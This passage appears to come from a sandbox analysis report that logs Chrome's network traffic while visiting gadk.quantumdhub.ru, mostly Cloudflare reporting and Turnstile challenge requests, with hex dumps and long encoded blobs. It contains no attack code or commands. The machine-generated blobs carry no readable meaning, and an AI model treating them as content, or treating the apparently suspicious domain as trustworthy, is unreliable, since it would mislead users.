                                                                                                                                                                                                                                                          Data Ascii: Z0A6g2tEPj5UcF9eVmODX21ehX6NZohmgGJ0bGhufnV9bW6KhFufgpdxqX1zlZ5toYpvZKCjgbKGh6+WloudnHW7irS3gK2Qu4WXqr6sioDHxKamkb2nlqmpqrW6zdjKx9TQy8Sv3MHFxrLVzOnOqcfhxd2u76zG4MPNrNnt0brXy7nQ0PX9zvHIwuDV4PbfAQYL/vsM4/YRFAri+w7zEdEQHgLhIiMX/vYHKQUqIRv6J+z+/TAPKCQJ9gczKSs
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 56 52 2b 63 47 4e 37 66 59 46 37 53 45 35 59 57 6b 31 76 6b 6f 31 31 55 32 32 43 64 6c 4f 47 57 70 42 5a 64 46 31 35 66 4a 2b 4f 58 33 70 7a 5a 70 4b 4a 69 49 36 63 65 6e 6c 70 69 71 31 38 69 59 46 75 6b 34 79 6c 69 6e 71 57 72 72 2b 67 72 4a 57 38 6f 70 53 6c 65 62 2f 47 67 63 4f 37 6d 38 79 48 78 61 71 71 6a 70 7a 54 77 61 4f 68 72 39 72 59 74 74 57 77 6e 73 76 51 32 4e 6d 66 6c 37 37 66 34 39 6e 59 71 65 47 6b 71 2b 33 74 70 36 6e 51 35 73 7a 67 35 73 6e 51 2b 76 7a 53 31 74 2f 38 7a 4e 75 2b 39 76 7a 34 38 4f 4d 42 38 63 6b 43 77 75 33 65 41 4d 2f 70 2f 65 51 49 35 50 48 52 45 66 62 35 43 42 48 6d 48 2f 58 64 43 2f 6e 74 31 67 4d 65 33 2f 6a 66 43 79 30 4f 41 79 4d 64 36 53 51 65 36 67 72 72 4d 53 51 35 4f 52 45 50 39 44 76 30 4c 55 49 37 48 78 6f 2b
                                                                                                                                                                                                                                                          Data Ascii: VR+cGN7fYF7SE5YWk1vko11U22CdlOGWpBZdF15fJ+OX3pzZpKJiI6cenlpiq18iYFuk4ylinqWrr+grJW8opSleb/GgcO7m8yHxaqqjpzTwaOhr9rYttWwnsvQ2Nmfl77f49nYqeGkq+3tp6nQ5szg5snQ+vzS1t/8zNu+9vz48OMB8ckCwu3eAM/p/eQI5PHREfb5CBHmH/XdC/nt1gMe3/jfCy0OAyMd6SQe6grrMSQ5OREP9Dv0LUI7Hxo+


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          15192.168.2.54974335.190.80.14433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC536OUTOPTIONS /report/v4?s=4Zs16ks2siptKF0TTTImZcm1g8hmLIveGGK5ITF%2FStCvWAItQyCIHNRek7Du8k5yIEIQ8yqHdqLRiNw7ijlbbW6s48H58bHYSbVtsLqb8dlqa%2FQgnM7j7qPyOl4tAA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Origin: https://gadk.quantumdhub.ru
                                                                                                                                                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:35:58 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          access-control-max-age: 86400
                                                                                                                                                                                                                                                          access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                                          access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                                          date: Fri, 20 Dec 2024 23:35:58 GMT
                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          16192.168.2.54974935.190.80.14433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:59 UTC474OUTPOST /report/v4?s=4Zs16ks2siptKF0TTTImZcm1g8hmLIveGGK5ITF%2FStCvWAItQyCIHNRek7Du8k5yIEIQ8yqHdqLRiNw7ijlbbW6s48H58bHYSbVtsLqb8dlqa%2FQgnM7j7qPyOl4tAA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Content-Length: 460
                                                                                                                                                                                                                                                          Content-Type: application/reports+json
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:35:59 UTC460OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 35 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 67 61 64 6b 2e 71 75 61 6e 74 75 6d 64 68 75 62 2e 72 75 2f 48 58 38 68 69 4c 50 61 64 61 7a 31 4e 37 57 72 6c 74 70 50 6a 48 67 33 34 71 5f 32 43 39 38 69 67 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 30 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72
                                                                                                                                                                                                                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":655,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://gadk.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/","sampling_fraction":1.0,"server_ip":"104.21.80.1","status_code":404,"type":"http.er
                                                                                                                                                                                                                                                          2024-12-20 23:36:00 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          date: Fri, 20 Dec 2024 23:35:59 GMT
                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          17192.168.2.549750104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:59 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/646785597:1734736264:AViGtQzSaaabc8hrjDXP21IkLtA_JA6kCdlbd7_lW4U/8f53738f5cfa15bb/Z6QE2UCD8GP1ik6GkC.hfElbKlamBauzDmHzwaBFQLs-1734737753-1.1.1.1-9mi5jcAkowfj88LcB7QDKM3IIlqsh0_ISo9UR_Wu85cb0Ya_9q16gt77fpCmc6aN HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:36:00 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:36:00 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 7
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          cf-chl-out: +6hL0pT3TJ97Y8rcnxtD/lwrfIFhoydpd3U=$aJ/2MbpsaKhdA8vd
                                                                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f5373b8bbb878df-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:36:00 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                          Data Ascii: invalid


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          18192.168.2.549751104.18.95.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:36:00 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f53738f5cfa15bb/1734737757657/266c2338cf1da0c0197c76b0ce5e22a9a128cea85378c77008f8b5687810be47/iRJ4oKYtIhGUez2 HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:36:00 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:36:00 GMT
                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 1
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2024-12-20 23:36:00 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 4a 6d 77 6a 4f 4d 38 64 6f 4d 41 5a 66 48 61 77 7a 6c 34 69 71 61 45 6f 7a 71 68 54 65 4d 64 77 43 50 69 31 61 48 67 51 76 6b 63 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gJmwjOM8doMAZfHawzl4iqaEozqhTeMdwCPi1aHgQvkcAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                                          2024-12-20 23:36:00 UTC1INData Raw: 4a
                                                                                                                                                                                                                                                          Data Ascii: J


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          19192.168.2.549756104.18.95.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:36:02 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f53738f5cfa15bb/1734737757661/UAGFpR2sTVmHXbx HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:36:03 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:36:03 GMT
                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                          Content-Length: 61
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f5373cbffec32e8-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:36:03 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 16 00 00 00 5d 08 02 00 00 00 2e 49 01 c3 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR].IIDAT$IENDB`


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          20192.168.2.549762104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:36:04 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f53738f5cfa15bb/1734737757661/UAGFpR2sTVmHXbx HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:36:05 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:36:04 GMT
                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                          Content-Length: 61
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f5373d65f1f1881-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:36:05 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 16 00 00 00 5d 08 02 00 00 00 2e 49 01 c3 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR].IIDAT$IENDB`


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          21192.168.2.549763104.18.95.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:36:04 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/646785597:1734736264:AViGtQzSaaabc8hrjDXP21IkLtA_JA6kCdlbd7_lW4U/8f53738f5cfa15bb/Z6QE2UCD8GP1ik6GkC.hfElbKlamBauzDmHzwaBFQLs-1734737753-1.1.1.1-9mi5jcAkowfj88LcB7QDKM3IIlqsh0_ISo9UR_Wu85cb0Ya_9q16gt77fpCmc6aN HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Content-Length: 32260
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          CF-Challenge: Z6QE2UCD8GP1ik6GkC.hfElbKlamBauzDmHzwaBFQLs-1734737753-1.1.1.1-9mi5jcAkowfj88LcB7QDKM3IIlqsh0_ISo9UR_Wu85cb0Ya_9q16gt77fpCmc6aN
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:36:04 UTC16384OUTData Raw: 76 5f 38 66 35 33 37 33 38 66 35 63 66 61 31 35 62 62 3d 25 32 62 4f 67 49 71 69 35 45 38 70 4f 35 38 6e 45 35 63 51 6c 51 59 6e 68 35 57 51 71 49 6e 24 35 68 45 35 64 51 70 24 78 49 51 4f 35 56 51 42 33 36 24 6e 44 79 48 51 66 51 35 49 6e 4f 24 51 74 68 51 77 24 35 70 51 45 24 24 6f 67 67 51 78 4f 35 32 51 4c 37 43 24 51 4c 24 51 6d 42 51 67 53 51 58 51 77 33 53 6e 4c 72 49 69 61 70 51 78 55 73 49 52 51 2d 71 54 69 51 79 49 51 62 78 51 2b 55 73 63 24 33 49 4a 32 48 41 4c 34 68 77 33 49 51 41 55 51 38 34 49 35 41 51 77 53 51 76 49 51 63 69 49 69 63 38 74 75 5a 59 51 39 50 45 45 38 4e 43 53 66 78 51 35 76 5a 45 42 75 6f 44 24 50 33 51 4c 74 48 52 69 49 38 45 51 38 51 39 6d 59 73 34 66 39 72 51 70 53 52 48 52 76 6e 6b 70 72 62 62 24 69 74 4d 24 57 5a 6b 74
                                                                                                                                                                                                                                                          Data Ascii: v_8f53738f5cfa15bb=%2bOgIqi5E8pO58nE5cQlQYnh5WQqIn$5hE5dQp$xIQO5VQB36$nDyHQfQ5InO$QthQw$5pQE$$oggQxO52QL7C$QL$QmBQgSQXQw3SnLrIiapQxUsIRQ-qTiQyIQbxQ+Usc$3IJ2HAL4hw3IQAUQ84I5AQwSQvIQciIic8tuZYQ9PEE8NCSfxQ5vZEBuoD$P3QLtHRiI8EQ8Q9mYs4f9rQpSRHRvnkprbb$itM$WZkt
                                                                                                                                                                                                                                                          2024-12-20 23:36:04 UTC15876OUTData Raw: 69 68 2b 49 24 63 39 6b 4a 51 69 4b 51 52 24 32 4c 75 67 68 42 39 7a 32 50 78 58 51 78 47 4e 6b 4a 66 24 4b 51 6e 49 35 68 51 62 51 35 43 35 48 51 76 24 75 79 38 6c 51 70 51 70 34 6f 6b 64 72 38 68 43 6f 41 51 35 49 51 77 35 44 51 4e 79 6e 39 73 31 51 62 33 73 68 51 4e 51 32 51 35 44 35 39 38 6e 24 75 72 35 52 51 30 24 39 4f 35 4a 51 67 79 35 4d 35 69 79 74 79 75 48 51 66 51 6e 79 35 39 51 65 51 76 79 68 49 69 43 51 44 51 70 51 69 65 47 68 51 75 49 35 44 51 4d 51 68 79 51 48 51 76 24 75 67 35 6c 4f 6e 38 35 48 51 45 51 5a 49 68 43 24 52 51 35 49 39 71 49 48 51 2b 49 69 4f 51 64 4e 6c 51 65 68 51 58 51 69 4e 51 67 39 2b 51 4b 43 35 51 51 4a 51 24 79 35 4c 51 38 51 6f 79 68 38 69 75 51 67 43 6e 45 51 45 51 70 79 51 49 72 52 67 6b 47 79 37 35 59 51 2b 24 69
                                                                                                                                                                                                                                                          Data Ascii: ih+I$c9kJQiKQR$2LughB9z2PxXQxGNkJf$KQnI5hQbQ5C5HQv$uy8lQpQp4okdr8hCoAQ5IQw5DQNyn9s1Qb3shQNQ2Q5D598n$ur5RQ0$9O5JQgy5M5iytyuHQfQny59QeQvyhIiCQDQpQieGhQuI5DQMQhyQHQv$ug5lOn85HQEQZIhC$RQ5I9qIHQ+IiOQdNlQehQXQiNQg9+QKC5QQJQ$y5LQ8Qoyh8iuQgCnEQEQpyQIrRgkGy75YQ+$i
                                                                                                                                                                                                                                                          2024-12-20 23:36:05 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:36:05 GMT
                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                          Content-Length: 26284
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          cf-chl-gen: z8PzbtYNrzyOlYqy4Do8pRv16+hqK5elfjPRmOeW6q6ms1hqKSHui0hfyllNpHwuJpV3k4vEnlJamXmk$fX/r8UX9mSMNlYc3
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f5373d60fb9f795-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:36:05 UTC1039INData Raw: 58 32 4e 7a 55 34 36 54 5a 32 52 6a 68 31 70 75 58 4a 6c 62 57 34 46 33 67 6c 31 31 6c 57 46 68 65 5a 71 56 6e 57 32 65 6a 34 64 37 63 59 4f 4c 74 59 47 76 6f 4b 4e 30 72 34 53 71 6e 71 43 34 6d 4b 4f 78 72 6e 79 46 68 62 43 46 6e 73 79 6f 7a 72 71 6d 6a 63 61 64 78 4b 4f 54 77 70 58 58 6f 37 62 4d 78 4a 61 55 7a 37 43 33 76 4a 37 6c 76 62 66 65 34 4e 57 79 31 36 6a 75 36 73 37 4f 33 2f 48 71 36 2b 47 2b 35 4e 61 79 39 75 6a 45 37 4e 66 32 39 75 33 5a 77 64 59 42 32 74 37 35 42 4e 77 4d 77 77 63 4a 36 74 76 66 42 2f 37 50 33 78 45 45 46 39 49 56 38 75 67 4e 48 52 72 35 36 76 6f 45 33 69 51 69 46 67 4d 69 42 78 6f 71 49 69 77 4f 4a 76 30 41 38 79 38 41 4d 41 72 79 4e 6a 50 30 4e 7a 6e 2b 38 55 49 39 46 76 34 62 4e 7a 63 6e 46 45 49 42 48 69 49 58 52 77 6b
                                                                                                                                                                                                                                                          Data Ascii: X2NzU46TZ2Rjh1puXJlbW4F3gl11lWFheZqVnW2ej4d7cYOLtYGvoKN0r4SqnqC4mKOxrnyFhbCFnsyozrqmjcadxKOTwpXXo7bMxJaUz7C3vJ7lvbfe4NWy16ju6s7O3/Hq6+G+5Nay9ujE7Nf29u3ZwdYB2t75BNwMwwcJ6tvfB/7P3xEEF9IV8ugNHRr56voE3iQiFgMiBxoqIiwOJv0A8y8AMAryNjP0Nzn+8UI9Fv4bNzcnFEIBHiIXRwk
                                                                                                                                                                                                                                                          2024-12-20 23:36:05 UTC1369INData Raw: 56 67 46 6d 68 6d 6f 4e 65 6b 5a 57 44 6c 6e 71 65 72 47 32 41 65 36 61 44 68 4b 4b 4f 71 35 65 66 6b 6f 78 77 75 33 53 46 71 6e 75 4c 6c 4b 79 54 66 70 61 78 6e 62 57 65 74 4b 43 4d 68 5a 65 6a 6e 4d 44 50 79 4d 57 4d 6e 71 47 75 6b 4d 75 77 73 4c 71 32 7a 4e 50 41 74 61 37 4e 78 74 72 58 76 37 36 37 76 72 37 6e 78 73 2f 6e 71 4c 72 77 31 65 6e 73 36 73 48 73 37 75 6e 78 39 72 58 4a 38 2f 50 35 34 2f 6d 2b 35 37 37 68 77 38 4d 42 39 74 73 50 45 4f 37 4f 41 4f 6f 54 35 65 62 56 38 75 33 56 42 65 59 4f 31 68 38 55 48 65 45 42 34 77 4c 37 49 78 33 67 42 79 6f 41 41 53 4c 76 4a 52 4d 4a 2f 43 6a 75 44 69 45 4e 46 76 49 4e 46 54 45 4e 50 44 45 76 51 50 7a 38 49 44 51 5a 46 52 38 62 4e 55 78 43 42 53 4d 69 53 6b 63 75 4a 44 55 71 55 54 68 55 4e 42 74 4a 46 6b
                                                                                                                                                                                                                                                          Data Ascii: VgFmhmoNekZWDlnqerG2Ae6aDhKKOq5efkoxwu3SFqnuLlKyTfpaxnbWetKCMhZejnMDPyMWMnqGukMuwsLq2zNPAta7NxtrXv767vr7nxs/nqLrw1ens6sHs7unx9rXJ8/P54/m+577hw8MB9tsPEO7OAOoT5ebV8u3VBeYO1h8UHeEB4wL7Ix3gByoAASLvJRMJ/CjuDiENFvINFTENPDEvQPz8IDQZFR8bNUxCBSMiSkcuJDUqUThUNBtJFk
